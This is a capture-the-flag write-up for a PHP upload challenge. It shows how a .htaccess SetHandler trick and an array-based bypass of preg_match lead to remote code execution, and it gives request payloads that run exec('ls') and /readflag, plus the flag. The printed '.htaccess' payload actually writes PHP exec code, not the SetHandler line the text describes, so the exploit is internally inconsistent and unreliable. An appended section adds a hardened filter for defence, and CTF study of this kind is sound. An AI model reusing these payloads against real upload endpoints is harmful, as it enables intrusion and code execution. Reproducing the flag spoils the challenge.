
pcat/7/easygame

Name: easygame

Type: web

Author: kagi

Desc: bypass me

Link: http://139.9.251.90:8888/

Attach: None

Tips: None

Total: 125 First: 佚名 Second: Ricky Third: lu0sf

Writeup

<?php
highlight_file(__FILE__);
#### easy game

$upload = 'upload/'.md5("2021".$_SERVER['REMOTE_ADDR']);
@mkdir($upload);
file_put_contents($upload.'/index.php', '');
var_dump($upload);

if (isset($_POST['file']) && isset($_POST['file'])){
    if(preg_match('#.+\.ph(p[3457]?|t|tml)$|/#is',$_POST['file'])){
        die('file error');
    }
    if(preg_match('#\w{2,}|[678]|<\?|/#',$_POST['content'])){
        die('content error');
    }
    file_put_contents($upload.'/'.$_POST['file'], $_POST['content']);
}


if (isset($_GET['reset'])){
    @rmdir($upload);
}

Output of the var_dump() call above:

string(39) "upload/c946d761bddc7564ff3e45a77a54ae13"

We can write into the upload folder, but both the filename and the content are filtered. The task is to bypass both filters.

Bypass filename

The filename can't end in any PHP extension (.php, .php3/4/5/7, .pht, .phtml) and can't contain a slash. The only way is to upload a .htaccess file that tells Apache to execute every file in this folder as PHP.

.htaccess
SetHandler application/x-httpd-php

After that, we can upload a file under any name and request it; the server will execute it as PHP.

But how do we get that content past the content filter? Let's discuss below.

Bypass content

The filter is strict: any run of two or more word characters (\w{2,}), the digits 6, 7 and 8, the sequence <? and the slash are all rejected, so no meaningful PHP can be sent as a plain string. However, we can send the content as an array (content[1]=..., content[2]=..., one character per element). preg_match() cannot match an array subject (PHP 7 emits a warning and returns null instead of 1), so the check never fires, while file_put_contents() accepts an array and writes its elements joined together.

def gen_content(inp):
    # Build content[1]=%xx&content[2]=%xx... for the array bypass.
    # The index is advanced inside the loop (it was outside it before),
    # and every byte gets two hex digits so that e.g. '\n' becomes %0a.
    parts = []
    for i, c in enumerate(inp, start=1):
        parts.append('content[%d]=%%%02x' % (i, ord(c)))
    return '&'.join(parts)

With that, we can upload any PHP script to the server and gain RCE.

How to find the flag? After some searching on the server, we found a /readflag ELF binary that reads the flag file. Executing it returns the flag.

Payload

.htaccess file upload:

file=.htaccess&content[1]=<&content[2]=?&content[3]=p&content[4]=h&content[5]=p&content[6]=%0a&content[7]=e&content[8]=x&content[9]=e&content[10]=c&content[11]=(&content[12]="&content[13]=l&content[14]=s&content[15]="&content[16]=)&content[17]=%0a&content[18]=?&content[19]=>

payload file upload:

file=payload&content[1]=<&content[2]=?&content[3]=p&content[4]=h&content[5]=p&content[6]=%0a&content[7]=e&content[8]=c&content[9]=h&content[10]=o&content[11]=%20&content[12]=e&content[13]=x&content[14]=e&content[15]=c&content[16]=(&content[17]="&content[18]=/&content[19]=r&content[20]=e&content[21]=a&content[22]=d&content[23]=f&content[24]=l&content[25]=a&content[26]=g&content[27]="&content[28]=)&content[29]=%0a&content[30]=?&content[31]=>
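As an added example (not part of the original writeup), the following Python reconstructs what the challenge's file_put_contents() actually writes from the .htaccess request body above, then applies the page's two regexes both the way the challenge does (skipping the content check for array input) and the way a hardened handler should (checking the joined content and refusing dotfiles). It assumes array elements are written in arrival order, which is what PHP does for a single-dimension array.

```python
import re
from urllib.parse import parse_qsl

# The two checks from the challenge source on this page, translated to Python.
# re.ASCII makes \w behave like PCRE's default (no Unicode word characters).
FILE_RE = re.compile(r'.+\.ph(p[3457]?|t|tml)$|/', re.I | re.S)
CONTENT_RE = re.compile(r'\w{2,}|[678]|<\?|/', re.ASCII)

# The .htaccess request body from the writeup above (copied, not constructed).
HTACCESS_BODY = ('file=.htaccess&content[1]=<&content[2]=?&content[3]=p&content[4]=h'
                 '&content[5]=p&content[6]=%0a&content[7]=e&content[8]=x&content[9]=e'
                 '&content[10]=c&content[11]=(&content[12]="&content[13]=l&content[14]=s'
                 '&content[15]="&content[16]=)&content[17]=%0a&content[18]=?&content[19]=>')

def parse_upload(body):
    """Return (filename, content, content_was_array) for one form body.
    content[N]=... fields are joined in the order they arrive, which is what
    file_put_contents() does when handed an array instead of a string."""
    filename, parts, is_array = None, [], False
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key == 'file':
            filename = value
        elif key == 'content' or key.startswith('content['):
            is_array |= key != 'content'
            parts.append(value)
    return filename, ''.join(parts), is_array

def challenge_filter_blocks(filename, content, content_was_array):
    """Mirror the challenge: the content regex is effectively skipped for
    array input, because preg_match() never matches a non-string subject."""
    if FILE_RE.search(filename):
        return True
    return (not content_was_array) and CONTENT_RE.search(content) is not None

def hardened_filter_blocks(filename, content, content_was_array):
    """Defensive version: reject non-string content outright, refuse dotfiles
    such as .htaccess, and run the content regex on the bytes to be written."""
    if content_was_array or filename.startswith('.'):
        return True
    return FILE_RE.search(filename) is not None or CONTENT_RE.search(content) is not None
```

Running the hardened check on the reconstructed string is also a usable detection rule for request logs: anything that only passes because it arrived as an array is exactly the traffic worth alerting on.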

Flag

flag{46dd5c50-3e80-485e-80f4-f46b5d85f4b8}